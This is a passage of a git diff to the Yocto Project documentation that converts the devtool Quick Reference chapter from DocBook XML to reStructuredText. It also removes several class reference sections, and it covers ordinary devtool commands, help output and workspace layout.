-        <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-        class for additional information.
-    </para>
-
-    <note><title>Notes</title>
-        You do not use the <filename>useradd-staticids</filename>
-        class directly.
-        You either enable or disable the class by setting the
-        <filename>USERADDEXTENSION</filename> variable.
-        If you enable or disable the class in a configured system,
-        <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-        might contain incorrect <filename>uid</filename> and
-        <filename>gid</filename> values.
-        Deleting the <filename>TMPDIR</filename> directory
-        will correct this condition.
-    </note>
-</section>
-
-<section id='ref-classes-utility-tasks'>
-    <title><filename>utility-tasks.bbclass</filename></title>
-
-    <para>
-        The <filename>utility-tasks</filename> class provides support for
-        various "utility" type tasks that are applicable to all recipes,
-        such as
-        <link linkend='ref-tasks-clean'><filename>do_clean</filename></link> and
-        <link linkend='ref-tasks-listtasks'><filename>do_listtasks</filename></link>.
-    </para>
-
-    <para>
-        This class is enabled by default because it is inherited by
-        the
-        <link linkend='ref-classes-base'><filename>base</filename></link>
-        class.
-    </para>
-</section>
-
-<section id='ref-classes-utils'>
-    <title><filename>utils.bbclass</filename></title>
-
-    <para>
-        The <filename>utils</filename> class provides some useful Python
-        functions that are typically used in inline Python expressions
-        (e.g. <filename>${@...}</filename>).
-        One example use is for <filename>bb.utils.contains()</filename>.
-    </para>
-
-    <para>
-        This class is enabled by default because it is inherited by the
-        <link linkend='ref-classes-base'><filename>base</filename></link>
-        class.
-    </para>
-</section>
-
-<section id='ref-classes-vala'>
-    <title><filename>vala.bbclass</filename></title>
-
-    <para>
-        The <filename>vala</filename> class supports recipes that need to
-        build software written using the Vala programming language.
-    </para>
-</section>
-
-<section id='ref-classes-waf'>
-    <title><filename>waf.bbclass</filename></title>
-
-    <para>
-        The <filename>waf</filename> class supports recipes that need to build
-        software that uses the Waf build system.
-        You can use the
-        <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>
-        or
-        <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>
-        variables to specify additional configuration options to be passed on
-        the Waf command line.
-    </para>
-</section>
-
-<!-- Undocumented classes are:
-        image-empty.bbclass (possibly being dropped)
-        migrate_localcount.bbclass (still need a description)
--->
-
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-devtool-reference.rst b/documentation/ref-manual/ref-devtool-reference.rst
new file mode 100644
index 0000000000..9b9ddf53f5
--- /dev/null
+++ b/documentation/ref-manual/ref-devtool-reference.rst
@@ -0,0 +1,631 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***************************
+``devtool`` Quick Reference
+***************************
+
+The ``devtool`` command-line tool provides a number of features that
+help you build, test, and package software. This command is available
+alongside the ``bitbake`` command. Additionally, the ``devtool`` command
+is a key part of the extensible SDK.
+
+This chapter provides a Quick Reference for the ``devtool`` command. For
+more information on how to apply the command when using the extensible
+SDK, see the ":doc:`../sdk-manual/sdk-extensible`" chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual.
+
+.. _devtool-getting-help:
+
+Getting Help
+============
+
+The ``devtool`` command line is organized similarly to Git in that it
+has a number of sub-commands for each function. You can run
+``devtool --help`` to see all the commands:
+::
+
+   $ devtool -h
+   NOTE: Starting bitbake server...
+   usage: devtool [--basepath BASEPATH] [--bbpath BBPATH] [-d] [-q] [--color COLOR] [-h] <subcommand> ...
+
+   OpenEmbedded development tool
+
+   options:
+     --basepath BASEPATH   Base directory of SDK / build directory
+     --bbpath BBPATH       Explicitly specify the BBPATH, rather than getting it from the metadata
+     -d, --debug           Enable debug output
+     -q, --quiet           Print only errors
+     --color COLOR         Colorize output (where COLOR is auto, always, never)
+     -h, --help            show this help message and exit
+
+   subcommands:
+     Beginning work on a recipe:
+       add                   Add a new recipe
+       modify                Modify the source for an existing recipe
+       upgrade               Upgrade an existing recipe
+     Getting information:
+       status                Show workspace status
+       latest-version        Report the latest version of an existing recipe
+       check-upgrade-status  Report upgradability for multiple (or all) recipes
+       search                Search available recipes
+     Working on a recipe in the workspace:
+       build                 Build a recipe
+       rename                Rename a recipe file in the workspace
+       edit-recipe           Edit a recipe file
+       find-recipe           Find a recipe file
+       configure-help        Get help on configure script options
+       update-recipe         Apply changes from external source tree to recipe
+       reset                 Remove a recipe from your workspace
+       finish                Finish working on a recipe in your workspace
+     Testing changes on target:
+       deploy-target         Deploy recipe output files to live target machine
+       undeploy-target       Undeploy recipe output files in live target machine
+       build-image           Build image including workspace recipe packages
+     Advanced:
+       create-workspace      Set up workspace in an alternative location
+       extract               Extract the source for an existing recipe
+       sync                  Synchronize the source tree for an existing recipe
+       menuconfig            Alter build-time configuration for a recipe
+       import                Import exported tar archive into workspace
+       export                Export workspace into a tar archive
+     other:
+       selftest-reverse      Reverse value (for selftest)
+       pluginfile            Print the filename of this plugin
+       bbdir                 Print the BBPATH directory of this plugin
+       count                 How many times have this plugin been registered.
+       multiloaded           How many times have this plugin been initialized
+   Use devtool <subcommand> --help to get help on a specific command
+
+As directed in the general help output, you can
+get more syntax on a specific command by providing the command name and
+using "--help":
+::
+
+   $ devtool add --help
+   NOTE: Starting bitbake server...
+   usage: devtool add [-h] [--same-dir | --no-same-dir] [--fetch URI] [--npm-dev] [--version VERSION] [--no-git] [--srcrev SRCREV | --autorev] [--srcbranch SRCBRANCH] [--binary] [--also-native] [--src-subdir SUBDIR] [--mirrors]
+                      [--provides PROVIDES]
+                      [recipename] [srctree] [fetchuri]
+
+   Adds a new recipe to the workspace to build a specified source tree. Can optionally fetch a remote URI and unpack it to create the source tree.
+
+   arguments:
+     recipename            Name for new recipe to add (just name - no version, path or extension). If not specified, will attempt to auto-detect it.
+     srctree               Path to external source tree. If not specified, a subdirectory of /media/build1/poky/build/workspace/sources will be used.
+     fetchuri              Fetch the specified URI and extract it to create the source tree
+
+   options:
+     -h, --help            show this help message and exit
+     --same-dir, -s        Build in same directory as source
+     --no-same-dir         Force build in a separate build directory
+     --fetch URI, -f URI   Fetch the specified URI and extract it to create the source tree (deprecated - pass as positional argument instead)
+     --npm-dev             For npm, also fetch devDependencies
+     --version VERSION, -V VERSION
+                           Version to use within recipe (PV)
+     --no-git, -g          If fetching source, do not set up source tree as a git repository
+     --srcrev SRCREV, -S SRCREV
+                           Source revision to fetch if fetching from an SCM such as git (default latest)
+     --autorev, -a         When fetching from a git repository, set SRCREV in the recipe to a floating revision instead of fixed
+     --srcbranch SRCBRANCH, -B SRCBRANCH
+                           Branch in source repository if fetching from an SCM such as git (default master)
+     --binary, -b          Treat the source tree as something that should be installed verbatim (no compilation, same directory structure). Useful with binary packages e.g. RPMs.
+     --also-native         Also add native variant (i.e. support building recipe for the build host as well as the target machine)
+     --src-subdir SUBDIR   Specify subdirectory within source tree to use
+     --mirrors             Enable PREMIRRORS and MIRRORS for source tree fetching (disable by default).
+     --provides PROVIDES, -p PROVIDES
+                           Specify an alias for the item provided by the recipe. E.g. virtual/libgl
+
+.. _devtool-the-workspace-layer-structure:
+
+The Workspace Layer Structure
+=============================
+
+``devtool`` uses a "Workspace" layer in which to accomplish builds. This
+layer is not specific to any single ``devtool`` command but is rather a
+common working area used across the tool.
+
+The following figure shows the workspace structure:
+
+.. image:: figures/build-workspace-directory.png
+   :align: center
+   :scale: 70%
+
+.. code-block:: none
+
+   attic - A directory created if devtool believes it must preserve
+           anything when you run "devtool reset".  For example, if you
+           run "devtool add", make changes to the recipe, and then
+           run "devtool reset", devtool takes notice that the file has
+           been changed and moves it into the attic should you still
+           want the recipe.
+
+   README - Provides information on what is in workspace layer and how to
+            manage it.
+
+   .devtool_md5 - A checksum file used by devtool.
+
+   appends - A directory that contains *.bbappend files, which point to
+             external source.
+
+   conf - A configuration directory that contains the layer.conf file.
+
+   recipes - A directory containing recipes.  This directory contains a
+             folder for each directory added whose name matches that of the
+             added recipe.  devtool places the recipe.bb file
+             within that sub-directory.
+
+   sources - A directory containing a working copy of the source files used
+             when building the recipe.  This is the default directory used
+             as the location of the source tree when you do not provide a
+             source tree path.  This directory contains a folder for each
+             set of source files matched to a corresponding recipe.
+
+.. _devtool-adding-a-new-recipe-to-the-workspace:
+
+Adding a New Recipe to the Workspace Layer
+==========================================
+
+Use the ``devtool add`` command to add a new recipe to the workspace
+layer. The recipe you add should not exist - ``devtool`` creates it for
+you. The source files the recipe uses should exist in an external area.
+
+The following example creates and adds a new recipe named ``jackson`` to
+a workspace layer the tool creates. The source code built by the recipes
+resides in ``/home/user/sources/jackson``:
+::
+
+   $ devtool add jackson /home/user/sources/jackson
+
+If you add a recipe and the workspace layer does not exist, the command
+creates the layer and populates it as described in "`The Workspace Layer
+Structure <#devtool-the-workspace-layer-structure>`__" section.
+
+Running ``devtool add`` when the workspace layer exists causes the tool
+to add the recipe, append files, and source files into the existing
+workspace layer. The ``.bbappend`` file is created to point to the
+external source tree.
+
+.. note::
+
+   If your recipe has runtime dependencies defined, you must be sure
+   that these packages exist on the target hardware before attempting to
+   run your application. If dependent packages (e.g. libraries) do not
+   exist on the target, your application, when run, will fail to find
+   those functions. For more information, see the
+   ":ref:`ref-manual/ref-devtool-reference:deploying your software on the target machine`"
+   section.
+
+By default, ``devtool add`` uses the latest revision (i.e. master) when
+unpacking files from a remote URI. In some cases, you might want to
+specify a source revision by branch, tag, or commit hash. You can
+specify these options when using the ``devtool add`` command:
+
+-  To specify a source branch, use the ``--srcbranch`` option:
+   ::
+
+      $ devtool add --srcbranch DISTRO_NAME_NO_CAP jackson /home/user/sources/jackson
+
+   In the previous example, you are checking out the DISTRO_NAME_NO_CAP
+   branch.
+
+-  To specify a specific tag or commit hash, use the ``--srcrev``
+   option:
+   ::
+
+      $ devtool add --srcrev DISTRO_REL_TAG jackson /home/user/sources/jackson
+      $ devtool add --srcrev some_commit_hash /home/user/sources/jackson
+
+   The previous examples check out the
+   DISTRO_REL_TAG tag and the commit associated with the
+   some_commit_hash hash.
+
+.. note::
+
+   If you prefer to use the latest revision every time the recipe is
+   built, use the options ``--autorev`` or ``-a``.
+
+.. _devtool-extracting-the-source-for-an-existing-recipe:
+
+Extracting the Source for an Existing Recipe
+============================================
+
+Use the ``devtool extract`` command to extract the source for an
+existing recipe. When you use this command, you must supply the root
+name of the recipe (i.e. no version, paths, or extensions), and you must
+supply the directory to which you want the source extracted.
+
+Additional command options let you control the name of a development
+branch into which you can checkout the source and whether or not to keep
+a temporary directory, which is useful for debugging.
+
+.. _devtool-synchronizing-a-recipes-extracted-source-tree:
+
+Synchronizing a Recipe's Extracted Source Tree
+==============================================
+
+Use the ``devtool sync`` command to synchronize a previously extracted
+source tree for an existing recipe. When you use this command, you must
+supply the root name of the recipe (i.e. no version, paths, or
+extensions), and you must supply the directory to which you want the
+source extracted.
+
+Additional command options let you control the name of a development
+branch into which you can checkout the source and whether or not to keep
+a temporary directory, which is useful for debugging.
+
+.. _devtool-modifying-a-recipe:
+
+Modifying an Existing Recipe
+============================
+
+Use the ``devtool modify`` command to begin modifying the source of an
+existing recipe. This command is very similar to the
+:ref:`add <devtool-adding-a-new-recipe-to-the-workspace>` command
+except that it does not physically create the recipe in the workspace
+layer because the recipe already exists in an another layer.
+
+The ``devtool modify`` command extracts the source for a recipe, sets it
+up as a Git repository if the source had not already been fetched from
+Git, checks out a branch for development, and applies any patches from
+the recipe as commits on top. You can use the following command to
+checkout the source files:
+::
+
+   $ devtool modify recipe
+
+Using the above command form, ``devtool`` uses the existing recipe's
+:term:`SRC_URI` statement to locate the upstream source,
+extracts the source into the default sources location in the workspace.
+The default development branch used is "devtool".
+
+.. _devtool-edit-an-existing-recipe:
+
+Edit an Existing Recipe
+=======================
+
+Use the ``devtool edit-recipe`` command to run the default editor, which
+is identified using the ``EDITOR`` variable, on the specified recipe.
+
+When you use the ``devtool edit-recipe`` command, you must supply the
+root name of the recipe (i.e. no version, paths, or extensions). Also,
+the recipe file itself must reside in the workspace as a result of the
+``devtool add`` or ``devtool upgrade`` commands. However, you can
+override that requirement by using the "-a" or "--any-recipe" option.
+Using either of these options allows you to edit any recipe regardless
+of its location.
+
+.. _devtool-updating-a-recipe:
+
+Updating a Recipe
+=================
+
+Use the ``devtool update-recipe`` command to update your recipe with
+patches that reflect changes you make to the source files. For example,
+if you know you are going to work on some code, you could first use the
+:ref:`devtool modify <devtool-modifying-a-recipe>` command to extract
+the code and set up the workspace. After which, you could modify,
+compile, and test the code.
+
+When you are satisfied with the results and you have committed your
+changes to the Git repository, you can then run the
+``devtool update-recipe`` to create the patches and update the recipe:
+::
+
+   $ devtool update-recipe recipe
+
+If you run the ``devtool update-recipe``
+without committing your changes, the command ignores the changes.
+
+Often, you might want to apply customizations made to your software in
+your own layer rather than apply them to the original recipe. If so, you
+can use the ``-a`` or ``--append`` option with the
+``devtool update-recipe`` command. These options allow you to specify
+the layer into which to write an append file:
+::
+
+   $ devtool update-recipe recipe -a base-layer-directory
+
+The ``*.bbappend`` file is created at the
+appropriate path within the specified layer directory, which may or may
+not be in your ``bblayers.conf`` file. If an append file already exists,
+the command updates it appropriately.
+
+.. _devtool-checking-on-the-upgrade-status-of-a-recipe:
+
+Checking on the Upgrade Status of a Recipe
+==========================================
+
+Upstream recipes change over time. Consequently, you might find that you
+need to determine if you can upgrade a recipe to a newer version.
+
+To check on the upgrade status of a recipe, use the
+``devtool check-upgrade-status`` command. The command displays a table
+of your current recipe versions, the latest upstream versions, the email
+address of the recipe's maintainer, and any additional information such
+as commit hash strings and reasons you might not be able to upgrade a
+particular recipe.
+
+.. note::
+
+   -  For the ``oe-core`` layer, recipe maintainers come from the
+      `maintainers.inc <http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/distro/include/maintainers.inc>`_
+      file.
+
+   -  If the recipe is using the :ref:`bitbake:git-fetcher`
+      rather than a
+      tarball, the commit hash points to the commit that matches the
+      recipe's latest version tag.
+
+As with all ``devtool`` commands, you can get help on the individual
+command:
+::
+
+   $ devtool check-upgrade-status -h
+   NOTE: Starting bitbake server...
+   usage: devtool check-upgrade-status [-h] [--all] [recipe [recipe ...]]
+
+   Prints a table of recipes together with versions currently provided by recipes, and latest upstream versions, when there is a later version available
+
+   arguments:
+     recipe      Name of the recipe to report (omit to report upgrade info for all recipes)
+
+   options:
+     -h, --help  show this help message and exit
+     --all, -a   Show all recipes, not just recipes needing upgrade
+
+Unless you provide a specific recipe name on the command line, the
+command checks all recipes in all configured layers.
+
+Following is a partial example table that reports on all the recipes.
+Notice the reported reason for not upgrading the ``base-passwd`` recipe.
+In this example, while a new version is available upstream, you do not
+want to use it because the dependency on ``cdebconf`` is not easily
+satisfied.
+
+.. note::
+
+   When a reason for not upgrading displays, the reason is usually
+   written into the recipe using the ``RECIPE_NO_UPDATE_REASON``
+   variable. See the
+   :yocto_git:`base-passwd.bb </cgit/cgit.cgi/poky/tree/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb>`
+   recipe for an example.
+
+::
+
+   $ devtool check-upgrade-status
+   ...
+   NOTE: acpid 2.0.30 2.0.31 Ross Burton <ross.burton@intel.com>
+   NOTE: u-boot-fw-utils 2018.11 2019.01 Marek Vasut <marek.vasut@gmail.com> d3689267f92c5956e09cc7d1baa4700141662bff
+   NOTE: u-boot-tools 2018.11 2019.01 Marek Vasut <marek.vasut@gmail.com> d3689267f92c5956e09cc7d1baa4700141662bff
+   .
+   .
+   .
+   NOTE: base-passwd 3.5.29 3.5.45 Anuj Mittal <anuj.mittal@intel.com> cannot be updated due to: Version 3.5.38 requires cdebconf for update-passwd utility
+   NOTE: busybox 1.29.2 1.30.0 Andrej Valek <andrej.valek@siemens.com>
+   NOTE: dbus-test 1.12.10 1.12.12 Chen Qi <Qi.Chen@windriver.com>
+
+.. _devtool-upgrading-a-recipe:
+
+Upgrading a Recipe
+==================
+
+As software matures, upstream recipes are upgraded to newer versions. As
+a developer, you need to keep your local recipes up-to-date with the
+upstream version releases. Several methods exist by which you can
+upgrade recipes. You can read about them in the ":ref:`gs-upgrading-recipes`"
+section of the Yocto Project Development Tasks Manual. This section
+overviews the ``devtool upgrade`` command.
+
+Before you upgrade a recipe, you can check on its upgrade status. See
+the ":ref:`devtool-checking-on-the-upgrade-status-of-a-recipe`" section
+for more information.
+
+The ``devtool upgrade`` command upgrades an existing recipe to a more
+recent version of the recipe upstream. The command puts the upgraded
+recipe file along with any associated files into a "workspace" and, if
+necessary, extracts the source tree to a specified location. During the
+upgrade, patches associated with the recipe are rebased or added as
+needed.
+
+When you use the ``devtool upgrade`` command, you must supply the root
+name of the recipe (i.e. no version, paths, or extensions), and you must
+supply the directory to which you want the source extracted. Additional
+command options let you control things such as the version number to
+which you want to upgrade (i.e. the :term:`PV`), the source
+revision to which you want to upgrade (i.e. the
+:term:`SRCREV`), whether or not to apply patches, and so
+forth.
+
+You can read more on the ``devtool upgrade`` workflow in the
+":ref:`sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual. You can also see an example of
+how to use ``devtool upgrade`` in the ":ref:`gs-using-devtool-upgrade`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _devtool-resetting-a-recipe:
+
+Resetting a Recipe
+==================
+
+Use the ``devtool reset`` command to remove a recipe and its
+configuration (e.g. the corresponding ``.bbappend`` file) from the
+workspace layer. Realize that this command deletes the recipe and the
+append file. The command does not physically move them for you.
+Consequently, you must be sure to physically relocate your updated
+recipe and the append file outside of the workspace layer before running
+the ``devtool reset`` command.
+
+If the ``devtool reset`` command detects that the recipe or the append
+files have been modified, the command preserves the modified files in a
+separate "attic" subdirectory under the workspace layer.
+
+Here is an example that resets the workspace directory that contains the
+``mtr`` recipe:
+::
+
+   $ devtool reset mtr
+   NOTE: Cleaning sysroot for recipe mtr...
+   NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/mtr as-is; if you no longer need it then please delete it manually
+   $
+
+.. _devtool-building-your-recipe:
+
+Building Your Recipe
+====================
+
+Use the ``devtool build`` command to build your recipe. The
+``devtool build`` command is equivalent to the
+``bitbake -c populate_sysroot`` command.
+
+When you use the ``devtool build`` command, you must supply the root
+name of the recipe (i.e. do not provide versions, paths, or extensions).
+You can use either the "-s" or the "--disable-parallel-make" options to
+disable parallel makes during the build. Here is an example:
+::
+
+   $ devtool build recipe
+
+.. _devtool-building-your-image:
+
+Building Your Image
+===================
+
+Use the ``devtool build-image`` command to build an image, extending it
+to include packages from recipes in the workspace. Using this command is
+useful when you want an image that ready for immediate deployment onto a
+device for testing. For proper integration into a final image, you need
+to edit your custom image recipe appropriately.
+
+When you use the ``devtool build-image`` command, you must supply the
+name of the image. This command has no command line options:
+::
+
+   $ devtool build-image image
+
+.. _devtool-deploying-your-software-on-the-target-machine:
+
+Deploying Your Software on the Target Machine
+=============================================
+
+Use the ``devtool deploy-target`` command to deploy the recipe's build
+output to the live target machine:
+::
+
+   $ devtool deploy-target recipe target
+
+The target is the address of the target machine, which must be running
+an SSH server (i.e. ``user@hostname[:destdir]``).
+
+This command deploys all files installed during the
+:ref:`ref-tasks-install` task. Furthermore, you do not
+need to have package management enabled within the target machine. If
+you do, the package manager is bypassed.
+
+.. note::
+
+   The ``deploy-target`` functionality is for development only. You
+   should never use it to update an image that will be used in
+   production.
+
+Some conditions exist that could prevent a deployed application from
+behaving as expected. When both of the following conditions exist, your
+application has the potential to not behave correctly when run on the
+target:
+
+-  You are deploying a new application to the target and the recipe you
+   used to build the application had correctly defined runtime
+   dependencies.
+
+-  The target does not physically have the packages on which the
+   application depends installed.
+
+If both of these conditions exist, your application will not behave as
+expected. The reason for this misbehavior is because the
+``devtool deploy-target`` command does not deploy the packages (e.g.
+libraries) on which your new application depends. The assumption is that
+the packages are already on the target. Consequently, when a runtime
+call is made in the application for a dependent function (e.g. a library
+call), the function cannot be found.
+
+To be sure you have all the dependencies local to the target, you need
+to be sure that the packages are pre-deployed (installed) on the target
+before attempting to run your application.
+
+.. _devtool-removing-your-software-from-the-target-machine:
+
+Removing Your Software from the Target Machine
+==============================================
+
+Use the ``devtool undeploy-target`` command to remove deployed build
+output from the target machine. For the ``devtool undeploy-target``
+command to work, you must have previously used the
+":ref:`devtool deploy-target <ref-manual/ref-devtool-reference:deploying your software on the target machine>`"
+command.
+::
+
+   $ devtool undeploy-target recipe target
+
+The target is the
+address of the target machine, which must be running an SSH server (i.e.
+``user@hostname``).
+
+.. _devtool-creating-the-workspace:
+
+Creating the Workspace Layer in an Alternative Location
+=======================================================
+
+Use the ``devtool create-workspace`` command to create a new workspace
+layer in your :term:`Build Directory`. When you create a
+new workspace layer, it is populated with the ``README`` file and the
+``conf`` directory only.
+
+The following example creates a new workspace layer in your current
+working and by default names the workspace layer "workspace":
+::
+
+   $ devtool create-workspace
+
+You can create a workspace layer anywhere by supplying a pathname with
+the command. The following command creates a new workspace layer named
+"new-workspace":
+::
+
+   $ devtool create-workspace /home/scottrif/new-workspace
+
+.. _devtool-get-the-status-of-the-recipes-in-your-workspace:
+
+Get the Status of the Recipes in Your Workspace
+===============================================
+
+Use the ``devtool status`` command to list the recipes currently in your
+workspace. Information includes the paths to their respective external
+source trees.
+
+The ``devtool status`` command has no command-line options:
+::
+
+   $ devtool status
+
+Following is sample output after using
+:ref:`devtool add <ref-manual/ref-devtool-reference:adding a new recipe to the workspace layer>`
+to create and add the ``mtr_0.86.bb`` recipe to the ``workspace`` directory:
+::
+
+   $ devtool status
+   mtr:/home/scottrif/poky/build/workspace/sources/mtr (/home/scottrif/poky/build/workspace/recipes/mtr/mtr_0.86.bb)
+   $
+
+.. _devtool-search-for-available-target-recipes:
+
+Search for Available Target Recipes
+===================================
+
+Use the ``devtool search`` command to search for available target
+recipes. The command matches the recipe name, package name, description,
+and installed files. The command displays the recipe name as a result of
+a match.
+
+When you use the ``devtool search`` command, you must supply a keyword.
+The command uses the keyword when searching for a match.
diff --git a/documentation/ref-manual/ref-devtool-reference.xml b/documentation/ref-manual/ref-devtool-reference.xml
deleted file mode 100644
index 11f7399c5a..0000000000
--- a/documentation/ref-manual/ref-devtool-reference.xml
+++ /dev/null
@@ -1,841 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-devtool-reference'>
-    <title><filename>devtool</filename> Quick Reference</title>
-
-    <para>
-        The <filename>devtool</filename> command-line tool provides a number
-        of features that help you build, test, and package software.
-        This command is available alongside the <filename>bitbake</filename>
-        command.
-        Additionally, the <filename>devtool</filename> command is a key
-        part of the extensible SDK.
-    </para>
-
-    <para>
-        This chapter provides a Quick Reference for the
-        <filename>devtool</filename> command.
-        For more information on how to apply the command when using the
-        extensible SDK, see the
-        "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
-        chapter in the Yocto Project Application Development and the
-        Extensible Software Development Kit (eSDK) manual.
-    </para>
-
-    <section id='devtool-getting-help'>
-        <title>Getting Help</title>
-
-        <para>
-            The <filename>devtool</filename> command line is organized
-            similarly to Git in that it has a number of sub-commands for
-            each function.
-            You can run <filename>devtool --help</filename> to see all
-            the commands:
-            <literallayout class='monospaced'>
-     $ devtool -h
-     NOTE: Starting bitbake server...
-     usage: devtool [--basepath BASEPATH] [--bbpath BBPATH] [-d] [-q]
-                    [--color COLOR] [-h]
-                    &lt;subcommand&gt; ...
-
-     OpenEmbedded development tool
-
-     options:
-       --basepath BASEPATH   Base directory of SDK / build directory
-       --bbpath BBPATH       Explicitly specify the BBPATH, rather than getting it
-                             from the metadata
-       -d, --debug           Enable debug output
-       -q, --quiet           Print only errors
-       --color COLOR         Colorize output (where COLOR is auto, always, never)
-       -h, --help            show this help message and exit
-
-     subcommands:
-       Beginning work on a recipe:
-         add                   Add a new recipe
-         modify                Modify the source for an existing recipe
-         upgrade               Upgrade an existing recipe
-       Getting information:
-         status                Show workspace status
-         search                Search available recipes
-         latest-version        Report the latest version of an existing recipe
-         check-upgrade-status  Report upgradability for multiple (or all) recipes
-       Working on a recipe in the workspace:
-         build                 Build a recipe
-         rename                Rename a recipe file in the workspace
-         edit-recipe           Edit a recipe file
-         find-recipe           Find a recipe file
-         configure-help        Get help on configure script options
-         update-recipe         Apply changes from external source tree to recipe
-         reset                 Remove a recipe from your workspace
-         finish                Finish working on a recipe in your workspace
-       Testing changes on target:
-         deploy-target         Deploy recipe output files to live target machine
-         undeploy-target       Undeploy recipe output files in live target machine
-         build-image           Build image including workspace recipe packages
-       Advanced:
-         create-workspace      Set up workspace in an alternative location
-         export                Export workspace into a tar archive
-         import                Import exported tar archive into workspace
-         extract               Extract the source for an existing recipe
-         sync                  Synchronize the source tree for an existing recipe
-     Use devtool &lt;subcommand&gt; --help to get help on a specific command
-            </literallayout>
-            As directed in the general help output, you can get more syntax
-            on a specific command by providing the command name and using
-            "--help":
-            <literallayout class='monospaced'>
-     $ devtool add --help
-     NOTE: Starting bitbake server...
-     usage: devtool add [-h] [--same-dir | --no-same-dir] [--fetch URI]
-                        [--fetch-dev] [--version VERSION] [--no-git]
-                        [--srcrev SRCREV | --autorev] [--srcbranch SRCBRANCH]
-                        [--binary] [--also-native] [--src-subdir SUBDIR]
-                        [--mirrors] [--provides PROVIDES]
-                        [recipename] [srctree] [fetchuri]
-
-     Adds a new recipe to the workspace to build a specified source tree. Can
-     optionally fetch a remote URI and unpack it to create the source tree.
-
-     arguments:
-       recipename            Name for new recipe to add (just name - no version,
-                             path or extension). If not specified, will attempt to
-                             auto-detect it.
-       srctree               Path to external source tree. If not specified, a
-                             subdirectory of
-                             /home/scottrif/poky/build/workspace/sources will be
-                             used.
-       fetchuri              Fetch the specified URI and extract it to create the
-                             source tree
-
-     options:
-       -h, --help            show this help message and exit
-       --same-dir, -s        Build in same directory as source
-       --no-same-dir         Force build in a separate build directory
-       --fetch URI, -f URI   Fetch the specified URI and extract it to create the
-                             source tree (deprecated - pass as positional argument
-                             instead)
-       --fetch-dev           For npm, also fetch devDependencies
-       --version VERSION, -V VERSION
-                             Version to use within recipe (PV)
-       --no-git, -g          If fetching source, do not set up source tree as a git
-                             repository
-       --srcrev SRCREV, -S SRCREV
-                             Source revision to fetch if fetching from an SCM such
-                             as git (default latest)
-       --autorev, -a         When fetching from a git repository, set SRCREV in the
-                             recipe to a floating revision instead of fixed
-       --srcbranch SRCBRANCH, -B SRCBRANCH
-                             Branch in source repository if fetching from an SCM
-                             such as git (default master)
-       --binary, -b          Treat the source tree as something that should be
-                             installed verbatim (no compilation, same directory
-                             structure). Useful with binary packages e.g. RPMs.
-       --also-native         Also add native variant (i.e. support building recipe
-                             for the build host as well as the target machine)
-       --src-subdir SUBDIR   Specify subdirectory within source tree to use
-       --mirrors             Enable PREMIRRORS and MIRRORS for source tree fetching
-                             (disable by default).
-       --provides PROVIDES, -p PROVIDES
-                             Specify an alias for the item provided by the recipe.
-                             E.g. virtual/libgl
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-the-workspace-layer-structure'>
-        <title>The Workspace Layer Structure</title>
-
-        <para>
-            <filename>devtool</filename> uses a "Workspace" layer
-            in which to accomplish builds.
-            This layer is not specific to any single
-            <filename>devtool</filename> command but is rather a common
-            working area used across the tool.
-        </para>
-
-        <para>
-            The following figure shows the workspace structure:
-        </para>
-
-        <para>
-            <imagedata fileref="figures/build-workspace-directory.png"
-                width="6in" depth="5in" align="left" scale="70" />
-        </para>
-
-        <para>
-            <literallayout class='monospaced'>
-     attic - A directory created if devtool believes it must preserve
-             anything when you run "devtool reset".  For example, if you
-             run "devtool add", make changes to the recipe, and then
-             run "devtool reset", devtool takes notice that the file has
-             been changed and moves it into the attic should you still
-             want the recipe.
-
-     README - Provides information on what is in workspace layer and how to
-              manage it.
-
-     .devtool_md5 - A checksum file used by devtool.
-
-     appends - A directory that contains *.bbappend files, which point to
-               external source.
-
-     conf - A configuration directory that contains the layer.conf file.
-
-     recipes - A directory containing recipes.  This directory contains a
-               folder for each directory added whose name matches that of the
-               added recipe.  devtool places the <replaceable>recipe</replaceable>.bb file
-               within that sub-directory.
-
-     sources - A directory containing a working copy of the source files used
-               when building the recipe.  This is the default directory used
-               as the location of the source tree when you do not provide a
-               source tree path.  This directory contains a folder for each
-               set of source files matched to a corresponding recipe.
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='devtool-adding-a-new-recipe-to-the-workspace'>
-        <title>Adding a New Recipe to the Workspace Layer</title>
-
-        <para>
-            Use the <filename>devtool add</filename> command to add a new recipe
-            to the workspace layer.
-            The recipe you add should not exist -
-            <filename>devtool</filename> creates it for you.
-            The source files the recipe uses should exist in an external
-            area.
-        </para>
-
-        <para>
-            The following example creates and adds a new recipe named
-            <filename>jackson</filename> to a workspace layer the tool creates.
-            The source code built by the recipes resides in
-            <filename>/home/<replaceable>user</replaceable>/sources/jackson</filename>:
-            <literallayout class='monospaced'>
-     $ devtool add jackson /home/<replaceable>user</replaceable>/sources/jackson
-            </literallayout>
-        </para>
-
-        <para>
-            If you add a recipe and the workspace layer does not exist,
-            the command creates the layer and populates it as
-            described in
-            "<link linkend='devtool-the-workspace-layer-structure'>The Workspace Layer Structure</link>"
-            section.
-        </para>
-
-        <para>
-            Running <filename>devtool add</filename> when the
-            workspace layer exists causes the tool to add the recipe,
-            append files, and source files into the existing workspace layer.
-            The <filename>.bbappend</filename> file is created to point
-            to the external source tree.
-            <note>
-                If your recipe has runtime dependencies defined, you must be sure
-                that these packages exist on the target hardware before attempting
-                to run your application.
